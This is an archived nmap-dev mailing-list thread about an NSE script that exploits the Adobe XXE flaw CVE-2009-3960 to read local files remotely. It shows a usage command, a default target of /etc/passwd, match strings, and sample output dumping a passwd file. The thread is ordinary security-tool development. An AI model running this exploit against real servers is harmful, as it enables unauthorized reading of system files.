Nmap Development mailing list archives
Re: [NSE] http-cve-2009-3960 (Adobe XML External Entity Injection)
From: Hani Benhabiles <kroosec () gmail com>
Date: Mon, 2 Jan 2012 00:32:08 +0100
Hi Patrik, I've fixed this issue by adding matching tests in the attached version. -- Matching returned response body to confirm vulnerability local matchstart = '<?xml version="1.0" encoding="utf-8"?>' local matchend = '</string><null/></object></body></amfx>' local matchsize = 120 local matchnotvuln = '<string>External entities are not allowed</string>' Cheers, Hani. On Sun, Jan 1, 2012 at 9:12 PM, Patrik Karlsson <patrik () cqure net> wrote:
On Sat, Dec 31, 2011 at 3:47 PM, Hani Benhabiles <kroosec () gmail com>wrote:Hi list, description = [[ Exploits cve-2009-3960 also known as Adobe XML External Entity Injection. This vulnerability permits to read local files remotely and is present in BlazeDS 3.2 and earlier, LiveCycle 8.0.1, 8.2.1, and 9.0, LiveCycle Data Services 2.5.1, 2.6.1, and 3.0, Flex Data Services 2.0.1, and ColdFusion 7.0.2, 8.0, 8.0.1, and 9.0 For more information see: * http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf * http://www.osvdb.org/62292 * Metasploit module: auxiliary/scanner/http/adobe_xml_inject ]] --- -- @args http-cve-2009-3960.root Points to the root path. Defaults to "/" -- @args http-cve-2009-3960.readfile target file to be read. Defaults to "/etc/passwd" -- -- @usage -- nmap --script=http-cve-2009-3960 --script-arg http-http-cve-2009-3960.root="/root/" <target> -- --@output -- PORT STATE SERVICE -- 80/tcp open http --| http-cve-2009-3960: --| samples/messagebroker/http --| <?xml version="1.0" encoding="utf-8"?> --| <amfx ver="3"><body targetURI="/onResult" responseURI=""><object type="flex.messaging.messages.AcknowledgeMessage"><traits><string>timestamp</string> [...] root:x:0:0:root:/root:/bin/bash --| bin:*:1:1:bin:/bin:/sbin/nologin --| daemon:*:2:2:daemon:/sbin:/sbin/nologin --| adm:*:3:4:adm:/var/adm:/sbin/nologin --| lp:*:4:7:lp:/var/spool/lpd:/sbin/nologin --| sync:*:5:0:sync:/sbin:/bin/sync --| shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown --| halt:*:7:0:halt:/sbin:/sbin/halt --| mail:*:8:12:mail:/var/spool/mail:/sbin/nologin --| news:*:9:13:news:/etc/news: --| uucp:*:10:14:uucp:/var/spool/uucp:/sbin/nologin --| operator:*:11:0:operator:/root:/sbin/nologin --| games:*:12:100:games:/usr/games:/sbin/nologin --| gopher:*:13:30:gopher:/var/gopher:/sbin/nologin --| ftp:*:14:50:FTP User:/var/ftp:/sbin/nologin --| nobody:*:99:99:Nobody:/:/sbin/nologin --| nscd:!!:28:28:NSCD Daemon:/:/sbin/nologin --| vcsa:!!:69:69:virtual console memory owner:/dev:/sbin/nologin --| pcap:!!:77:77::/var/arpwatch:/sbin/nologin --| mailnull:!!:47:47::/var/spool/mqueue:/sbin/nologin --| [...] --|_ Cheers, Hani -- M. Hani Benhabiles OWASP Algeria SC founder and president. Blog: http://kroosec.blogspot.com Twitter: kroosec <https://twitter.com/#%21/kroosec> _______________________________________________ Sent through the nmap-dev mailing list http://cgi.insecure.org/mailman/listinfo/nmap-dev Archived at http://seclists.org/nmap-dev/Hi Hani, Thanks for contributing with this new script! I've had a quick look at it and see a problem with how it detects whether a server is vulnerable or not. As an example, the current script will detect any server responding to a non existant page (404) with a 200 OK with a body exceeding 120 characters as vulnerable. I guess the script needs to check for some other characteristics as well. Unfortunately I don't have access to anything I can test against, but if you have some packet captures I might be able to lend you a hand. Cheers, Patrik -- Patrik Karlsson http://www.cqure.net http://twitter.com/nevdull77
-- M. Hani Benhabiles OWASP Algeria SC founder and president. Blog: http://kroosec.blogspot.com Twitter: kroosec <https://twitter.com/#%21/kroosec>
Attachment:
http-cve-2009-3960.nse
Description:
_______________________________________________ Sent through the nmap-dev mailing list http://cgi.insecure.org/mailman/listinfo/nmap-dev Archived at http://seclists.org/nmap-dev/
Current thread:
- Re: [NSE] http-cve-2009-3960 (Adobe XML External Entity Injection) Patrik Karlsson (Jan 01)
- Re: [NSE] http-cve-2009-3960 (Adobe XML External Entity Injection) Hani Benhabiles (Jan 01)
- Re: [NSE] http-cve-2009-3960 (Adobe XML External Entity Injection) Patrik Karlsson (Jan 02)
- Re: [NSE] http-cve-2009-3960 (Adobe XML External Entity Injection) Patrik Karlsson (Jan 02)
- Re: [NSE] http-cve-2009-3960 (Adobe XML External Entity Injection) Hani Benhabiles (Jan 02)
- Re: [NSE] http-cve-2009-3960 (Adobe XML External Entity Injection) Patrik Karlsson (Jan 02)
- Re: [NSE] http-cve-2009-3960 (Adobe XML External Entity Injection) Hani Benhabiles (Jan 02)
- Re: [NSE] http-cve-2009-3960 (Adobe XML External Entity Injection) Patrik Karlsson (Jan 02)
- Re: [NSE] http-cve-2009-3960 (Adobe XML External Entity Injection) Hani Benhabiles (Jan 02)
- Re: [NSE] http-cve-2009-3960 (Adobe XML External Entity Injection) Patrik Karlsson (Jan 02)
- Re: [NSE] http-cve-2009-3960 (Adobe XML External Entity Injection) Patrik Karlsson (Jan 02)
- Re: [NSE] http-cve-2009-3960 (Adobe XML External Entity Injection) Hani Benhabiles (Jan 01)